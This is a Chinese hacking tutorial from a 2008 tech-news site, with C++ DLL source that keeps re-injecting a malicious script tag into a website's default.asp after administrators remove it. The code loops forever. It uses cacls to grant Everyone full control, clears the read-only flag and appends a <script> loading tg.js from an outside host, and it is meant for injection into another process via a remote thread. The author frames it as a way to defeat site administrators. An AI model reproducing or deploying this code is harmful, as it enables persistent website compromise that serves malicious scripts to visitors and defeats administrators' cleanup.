编程之简单监控文件挂马程序制作


IT资讯	系统天下	网盟学院


硬件DIY	软件下载	网络安全

您现在的位置： ChinaBeta.cn 中文IT资讯 >> 网络安全 >> HACK教程 >> HACK技术正文

编程之简单监控文件挂马程序制作

Www.ChinaBeta.Cn 更新时间：2008-5-17

【ChinaBeta.Cn 网络安全】

本人挂马语句经常被管理员KILL，但是自己也有管理员权限，保留的很好，既然被他发现了，怎么说我们也要强行挂上1天到2天，让他去重做系统去。下面是一个简单的监控某个文件，给予他访问的权限。然后在检查代码中有无我们事先插入的代码，没的话就插入，有的话，等等在检查便。如此循环。此程序只提供个简单的思路，无自启动代码。只实现这个功能，关于进程隐藏，自启动自己解决。因我是一个EXE远程线程插入DLL。所以我的主程序是个DLL文件，因此代码是个DLL工程
代码如下：
#include "stdafx.h"
#include "process.h"
#include "windows.h"
#include "string.h"
#include "iostream.h"
#include "fstream.h"
char path2[256]="E:\\gxm\\default.asp";
char guama[256]="\n<script language=javascript src=’http://www.gxm520.cn/tg.js’></script>";
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                                         )
{
        switch ( ul_reason_for_call )
        {
                case DLL_PROCESS_ATTACH:
                {
                        while(1)
        {
ifstream ifs(path2);
char FileContent[5000];
memset(FileContent,0,5000);//初始化FileContent
ifs.read(FileContent,5000);//读取数据
ifs.close();//关闭ifstream对像
if(strstr(FileContent,guama)==0)
{
    char path1[256]="E:\\gxm\\default.asp ";      //比变量path2多了一个空格
        char mingling[256]="cacls ";
    strcat(mingling,path1);
    char ps[25]="/T /E /C /G everyone:F";
        strcat(mingling,ps);
    char mingling1[256]="cacls ";
        strcat(mingling1,path1);
        char pa[30]="/T /E /C /G administrator:F";
    strcat(mingling1,pa);
        system(mingling);
    system(mingling1);
        SetFileAttributes(path2,GetFileAttributes(path1) & ~FILE_ATTRIBUTE_READONLY);
    ofstream outfile;
        outfile.open(path2,ios::app);
        if (!outfile)
        {
                exit(0);
        }
outfile<<guama;
outfile.close();
}
Sleep(9000);
        }
                }
                default:
                        return TRUE;
        }
        return TRUE;
}

简单的监控文件程序的代码而已，我也不知道别人是怎么写的，反正自己是这样想出来一点一点的写点，希望对我们一样菜的人有点帮助